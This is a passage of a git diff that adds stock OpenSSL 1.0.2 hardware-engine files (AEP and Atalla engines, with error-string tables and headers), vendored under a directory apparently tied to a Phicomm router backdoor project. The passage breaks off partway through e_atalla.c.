+static int aep_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                           BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                           BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+    BN_init(&t);
+
+    /* let rr = a1 ^ p1 mod m */
+    if (!aep_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!aep_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static int aep_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                           const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                           BN_MONT_CTX *m_ctx)
+{
+    return aep_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_RSA
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int aep_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                            const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx)
+{
+    return aep_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* This function is aliased to mod_exp (with the dh and mont dropped). */
+static int aep_mod_exp_dh(const DH *dh, BIGNUM *r, const BIGNUM *a,
+                          const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                          BN_MONT_CTX *m_ctx)
+{
+    return aep_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+static AEP_RV aep_get_connection(AEP_CONNECTION_HNDL_PTR phConnection)
+{
+    int count;
+    AEP_RV rv = AEP_R_OK;
+
+    /*
+     * Get the current process id
+     */
+    pid_t curr_pid;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+
+    curr_pid = getpid();
+
+    /*
+     * Check if this is the first time this is being called from the current
+     * process
+     */
+    if (recorded_pid != curr_pid) {
+        /*
+         * Remember our pid so we can check if we're in a new process
+         */
+        recorded_pid = curr_pid;
+
+        /*
+         * Call Finalize to make sure we have not inherited some data from a
+         * parent process
+         */
+        p_AEP_Finalize();
+
+        /*
+         * Initialise the AEP API
+         */
+        rv = p_AEP_Initialize(NULL);
+
+        if (rv != AEP_R_OK) {
+            AEPHKerr(AEPHK_F_AEP_GET_CONNECTION, AEPHK_R_INIT_FAILURE);
+            recorded_pid = 0;
+            goto end;
+        }
+
+        /*
+         * Set the AEP big num call back functions
+         */
+        rv = p_AEP_SetBNCallBacks(&GetBigNumSize, &MakeAEPBigNum,
+                                  &ConvertAEPBigNum);
+
+        if (rv != AEP_R_OK) {
+            AEPHKerr(AEPHK_F_AEP_GET_CONNECTION,
+                     AEPHK_R_SETBNCALLBACK_FAILURE);
+            recorded_pid = 0;
+            goto end;
+        }
+#  ifdef AEPRAND
+        /*
+         * Reset the rand byte count
+         */
+        rand_block_bytes = 0;
+#  endif
+
+        /*
+         * Init the structures
+         */
+        for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+            aep_app_conn_table[count].conn_state = NotConnected;
+            aep_app_conn_table[count].conn_hndl = 0;
+        }
+
+        /*
+         * Open a connection
+         */
+        rv = p_AEP_OpenConnection(phConnection);
+
+        if (rv != AEP_R_OK) {
+            AEPHKerr(AEPHK_F_AEP_GET_CONNECTION, AEPHK_R_UNIT_FAILURE);
+            recorded_pid = 0;
+            goto end;
+        }
+
+        aep_app_conn_table[0].conn_state = InUse;
+        aep_app_conn_table[0].conn_hndl = *phConnection;
+        goto end;
+    }
+    /*
+     * Check the existing connections to see if we can find a free one
+     */
+    for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+        if (aep_app_conn_table[count].conn_state == Connected) {
+            aep_app_conn_table[count].conn_state = InUse;
+            *phConnection = aep_app_conn_table[count].conn_hndl;
+            goto end;
+        }
+    }
+    /*
+     * If no connections available, we're going to have to try to open a new
+     * one
+     */
+    for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+        if (aep_app_conn_table[count].conn_state == NotConnected) {
+            /*
+             * Open a connection
+             */
+            rv = p_AEP_OpenConnection(phConnection);
+
+            if (rv != AEP_R_OK) {
+                AEPHKerr(AEPHK_F_AEP_GET_CONNECTION, AEPHK_R_UNIT_FAILURE);
+                goto end;
+            }
+
+            aep_app_conn_table[count].conn_state = InUse;
+            aep_app_conn_table[count].conn_hndl = *phConnection;
+            goto end;
+        }
+    }
+    rv = AEP_R_GENERAL_ERROR;
+ end:
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return rv;
+}
+
+static AEP_RV aep_return_connection(AEP_CONNECTION_HNDL hConnection)
+{
+    int count;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+
+    /*
+     * Find the connection item that matches this connection handle
+     */
+    for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+        if (aep_app_conn_table[count].conn_hndl == hConnection) {
+            aep_app_conn_table[count].conn_state = Connected;
+            break;
+        }
+    }
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+
+    return AEP_R_OK;
+}
+
+static AEP_RV aep_close_connection(AEP_CONNECTION_HNDL hConnection)
+{
+    int count;
+    AEP_RV rv = AEP_R_OK;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+
+    /*
+     * Find the connection item that matches this connection handle
+     */
+    for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+        if (aep_app_conn_table[count].conn_hndl == hConnection) {
+            rv = p_AEP_CloseConnection(aep_app_conn_table[count].conn_hndl);
+            if (rv != AEP_R_OK)
+                goto end;
+            aep_app_conn_table[count].conn_state = NotConnected;
+            aep_app_conn_table[count].conn_hndl = 0;
+            break;
+        }
+    }
+
+ end:
+    CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return rv;
+}
+
+static AEP_RV aep_close_all_connections(int use_engine_lock, int *in_use)
+{
+    int count;
+    AEP_RV rv = AEP_R_OK;
+
+    *in_use = 0;
+    if (use_engine_lock)
+        CRYPTO_w_lock(CRYPTO_LOCK_ENGINE);
+    for (count = 0; count < MAX_PROCESS_CONNECTIONS; count++) {
+        switch (aep_app_conn_table[count].conn_state) {
+        case Connected:
+            rv = p_AEP_CloseConnection(aep_app_conn_table[count].conn_hndl);
+            if (rv != AEP_R_OK)
+                goto end;
+            aep_app_conn_table[count].conn_state = NotConnected;
+            aep_app_conn_table[count].conn_hndl = 0;
+            break;
+        case InUse:
+            (*in_use)++;
+            break;
+        case NotConnected:
+            break;
+        }
+    }
+ end:
+    if (use_engine_lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_ENGINE);
+    return rv;
+}
+
+/*
+ * BigNum call back functions, used to convert OpenSSL bignums into AEP
+ * bignums. Note only 32bit Openssl build support
+ */
+
+static AEP_RV GetBigNumSize(AEP_VOID_PTR ArbBigNum, AEP_U32 *BigNumSize)
+{
+    BIGNUM *bn;
+
+    /*
+     * Cast the ArbBigNum pointer to our BIGNUM struct
+     */
+    bn = (BIGNUM *)ArbBigNum;
+
+#  ifdef SIXTY_FOUR_BIT_LONG
+    *BigNumSize = bn->top << 3;
+#  else
+    /*
+     * Size of the bignum in bytes is equal to the bn->top (no of 32 bit
+     * words) multiplies by 4
+     */
+    *BigNumSize = bn->top << 2;
+#  endif
+
+    return AEP_R_OK;
+}
+
+static AEP_RV MakeAEPBigNum(AEP_VOID_PTR ArbBigNum, AEP_U32 BigNumSize,
+                            unsigned char *AEP_BigNum)
+{
+    BIGNUM *bn;
+
+#  ifndef SIXTY_FOUR_BIT_LONG
+    unsigned char *buf;
+    int i;
+#  endif
+
+    /*
+     * Cast the ArbBigNum pointer to our BIGNUM struct
+     */
+    bn = (BIGNUM *)ArbBigNum;
+
+#  ifdef SIXTY_FOUR_BIT_LONG
+    memcpy(AEP_BigNum, bn->d, BigNumSize);
+#  else
+    /*
+     * Must copy data into a (monotone) least significant byte first format
+     * performing endian conversion if necessary
+     */
+    for (i = 0; i < bn->top; i++) {
+        buf = (unsigned char *)&bn->d[i];
+
+        *((AEP_U32 *)AEP_BigNum) = (AEP_U32)
+            ((unsigned)buf[1] << 8 | buf[0]) |
+            ((unsigned)buf[3] << 8 | buf[2]) << 16;
+
+        AEP_BigNum += 4;
+    }
+#  endif
+
+    return AEP_R_OK;
+}
+
+/*
+ * Turn an AEP Big Num back to a user big num
+ */
+static AEP_RV ConvertAEPBigNum(void *ArbBigNum, AEP_U32 BigNumSize,
+                               unsigned char *AEP_BigNum)
+{
+    BIGNUM *bn;
+#  ifndef SIXTY_FOUR_BIT_LONG
+    int i;
+#  endif
+
+    bn = (BIGNUM *)ArbBigNum;
+
+    /*
+     * Expand the result bn so that it can hold our big num. Size is in bits
+     */
+    bn_expand(bn, (int)(BigNumSize << 3));
+
+#  ifdef SIXTY_FOUR_BIT_LONG
+    bn->top = BigNumSize >> 3;
+
+    if ((BigNumSize & 7) != 0)
+        bn->top++;
+
+    memset(bn->d, 0, bn->top << 3);
+
+    memcpy(bn->d, AEP_BigNum, BigNumSize);
+#  else
+    bn->top = BigNumSize >> 2;
+
+    for (i = 0; i < bn->top; i++) {
+        bn->d[i] = (AEP_U32)
+            ((unsigned)AEP_BigNum[3] << 8 | AEP_BigNum[2]) << 16 |
+            ((unsigned)AEP_BigNum[1] << 8 | AEP_BigNum[0]);
+        AEP_BigNum += 4;
+    }
+#  endif
+
+    return AEP_R_OK;
+}
+
+# endif                         /* !OPENSSL_NO_HW_AEP */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.ec
new file mode 100644
index 0000000..8eae642
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep.ec
@@ -0,0 +1 @@
+L AEPHK		e_aep_err.h			e_aep_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.c
new file mode 100644
index 0000000..718db37
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.c
@@ -0,0 +1,159 @@
+/* e_aep_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_aep_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA AEPHK_str_functs[] = {
+    {ERR_FUNC(AEPHK_F_AEP_CTRL), "AEP_CTRL"},
+    {ERR_FUNC(AEPHK_F_AEP_FINISH), "AEP_FINISH"},
+    {ERR_FUNC(AEPHK_F_AEP_GET_CONNECTION), "AEP_GET_CONNECTION"},
+    {ERR_FUNC(AEPHK_F_AEP_INIT), "AEP_INIT"},
+    {ERR_FUNC(AEPHK_F_AEP_MOD_EXP), "AEP_MOD_EXP"},
+    {ERR_FUNC(AEPHK_F_AEP_MOD_EXP_CRT), "AEP_MOD_EXP_CRT"},
+    {ERR_FUNC(AEPHK_F_AEP_RAND), "AEP_RAND"},
+    {ERR_FUNC(AEPHK_F_AEP_RSA_MOD_EXP), "AEP_RSA_MOD_EXP"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA AEPHK_str_reasons[] = {
+    {ERR_REASON(AEPHK_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(AEPHK_R_CLOSE_HANDLES_FAILED), "close handles failed"},
+    {ERR_REASON(AEPHK_R_CONNECTIONS_IN_USE), "connections in use"},
+    {ERR_REASON(AEPHK_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(AEPHK_R_FINALIZE_FAILED), "finalize failed"},
+    {ERR_REASON(AEPHK_R_GET_HANDLE_FAILED), "get handle failed"},
+    {ERR_REASON(AEPHK_R_GET_RANDOM_FAILED), "get random failed"},
+    {ERR_REASON(AEPHK_R_INIT_FAILURE), "init failure"},
+    {ERR_REASON(AEPHK_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(AEPHK_R_MOD_EXP_CRT_FAILED), "mod exp crt failed"},
+    {ERR_REASON(AEPHK_R_MOD_EXP_FAILED), "mod exp failed"},
+    {ERR_REASON(AEPHK_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(AEPHK_R_OK), "ok"},
+    {ERR_REASON(AEPHK_R_RETURN_CONNECTION_FAILED),
+     "return connection failed"},
+    {ERR_REASON(AEPHK_R_SETBNCALLBACK_FAILURE), "setbncallback failure"},
+    {ERR_REASON(AEPHK_R_SIZE_TOO_LARGE_OR_TOO_SMALL),
+     "size too large or too small"},
+    {ERR_REASON(AEPHK_R_UNIT_FAILURE), "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef AEPHK_LIB_NAME
+static ERR_STRING_DATA AEPHK_lib_name[] = {
+    {0, AEPHK_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int AEPHK_lib_error_code = 0;
+static int AEPHK_error_init = 1;
+
+static void ERR_load_AEPHK_strings(void)
+{
+    if (AEPHK_lib_error_code == 0)
+        AEPHK_lib_error_code = ERR_get_next_error_library();
+
+    if (AEPHK_error_init) {
+        AEPHK_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(AEPHK_lib_error_code, AEPHK_str_functs);
+        ERR_load_strings(AEPHK_lib_error_code, AEPHK_str_reasons);
+#endif
+
+#ifdef AEPHK_LIB_NAME
+        AEPHK_lib_name->error = ERR_PACK(AEPHK_lib_error_code, 0, 0);
+        ERR_load_strings(0, AEPHK_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_AEPHK_strings(void)
+{
+    if (AEPHK_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(AEPHK_lib_error_code, AEPHK_str_functs);
+        ERR_unload_strings(AEPHK_lib_error_code, AEPHK_str_reasons);
+#endif
+
+#ifdef AEPHK_LIB_NAME
+        ERR_unload_strings(0, AEPHK_lib_name);
+#endif
+        AEPHK_error_init = 1;
+    }
+}
+
+static void ERR_AEPHK_error(int function, int reason, char *file, int line)
+{
+    if (AEPHK_lib_error_code == 0)
+        AEPHK_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(AEPHK_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.h
new file mode 100644
index 0000000..2ed0114
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_aep_err.h
@@ -0,0 +1,106 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_AEPHK_ERR_H
+# define HEADER_AEPHK_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_AEPHK_strings(void);
+static void ERR_unload_AEPHK_strings(void);
+static void ERR_AEPHK_error(int function, int reason, char *file, int line);
+# define AEPHKerr(f,r) ERR_AEPHK_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the AEPHK functions. */
+
+/* Function codes. */
+# define AEPHK_F_AEP_CTRL                                 100
+# define AEPHK_F_AEP_FINISH                               101
+# define AEPHK_F_AEP_GET_CONNECTION                       102
+# define AEPHK_F_AEP_INIT                                 103
+# define AEPHK_F_AEP_MOD_EXP                              104
+# define AEPHK_F_AEP_MOD_EXP_CRT                          105
+# define AEPHK_F_AEP_RAND                                 106
+# define AEPHK_F_AEP_RSA_MOD_EXP                          107
+
+/* Reason codes. */
+# define AEPHK_R_ALREADY_LOADED                           100
+# define AEPHK_R_CLOSE_HANDLES_FAILED                     101
+# define AEPHK_R_CONNECTIONS_IN_USE                       102
+# define AEPHK_R_CTRL_COMMAND_NOT_IMPLEMENTED             103
+# define AEPHK_R_FINALIZE_FAILED                          104
+# define AEPHK_R_GET_HANDLE_FAILED                        105
+# define AEPHK_R_GET_RANDOM_FAILED                        106
+# define AEPHK_R_INIT_FAILURE                             107
+# define AEPHK_R_MISSING_KEY_COMPONENTS                   108
+# define AEPHK_R_MOD_EXP_CRT_FAILED                       109
+# define AEPHK_R_MOD_EXP_FAILED                           110
+# define AEPHK_R_NOT_LOADED                               111
+# define AEPHK_R_OK                                       112
+# define AEPHK_R_RETURN_CONNECTION_FAILED                 113
+# define AEPHK_R_SETBNCALLBACK_FAILURE                    114
+# define AEPHK_R_SIZE_TOO_LARGE_OR_TOO_SMALL              116
+# define AEPHK_R_UNIT_FAILURE                             115
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.c
new file mode 100644
index 0000000..6a324e6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_atalla.c
@@ -0,0 +1,626 @@
+/* crypto/engine/hw_atalla.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#include <openssl/bn.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_ATALLA
+
+#  ifdef FLAT_INC
+#   include "atalla.h"
+#  else
+#   include "vendor_defns/atalla.h"
+#  endif
+
+#  define ATALLA_LIB_NAME "atalla engine"
+#  include "e_atalla_err.c"
+
+static int atalla_destroy(ENGINE *e);
+static int atalla_init(ENGINE *e);
+static int atalla_finish(ENGINE *e);
+static int atalla_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+
+/* BIGNUM stuff */
+static int atalla_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                          const BIGNUM *m, BN_CTX *ctx);
+
+#  ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int atalla_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa,
+                              BN_CTX *ctx);
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int atalla_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                               const BIGNUM *m, BN_CTX *ctx,
+                               BN_MONT_CTX *m_ctx);
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* DSA stuff */
+static int atalla_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                              BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                              BN_CTX *ctx, BN_MONT_CTX *in_mont);
+static int atalla_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                              const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx);
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* DH stuff */
+/* This function is alised to mod_exp (with the DH and mont dropped). */
+static int atalla_mod_exp_dh(const DH *dh, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx);
+#  endif
+
+/* The definitions for control commands specific to this engine */
+#  define ATALLA_CMD_SO_PATH              ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN atalla_cmd_defns[] = {
+    {ATALLA_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'atasi' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD atalla_rsa = {
+    "Atalla RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    atalla_rsa_mod_exp,
+    atalla_mod_exp_mont,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* Our internal DSA_METHOD that we provide pointers to */
+static DSA_METHOD atalla_dsa = {
+    "Atalla DSA method",
+    NULL,                       /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    NULL,                       /* dsa_do_verify */
+    atalla_dsa_mod_exp,         /* dsa_mod_exp */
+    atalla_mod_exp_dsa,         /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL,                       /* app_data */
+    NULL,                       /* dsa_paramgen */
+    NULL                        /* dsa_keygen */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD atalla_dh = {
+    "Atalla DH method",
+    NULL,
+    NULL,
+    atalla_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL
+};
+#  endif
+
+/* Constants used when creating the ENGINE */
+static const char *engine_atalla_id = "atalla";
+static const char *engine_atalla_name = "Atalla hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_atalla() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
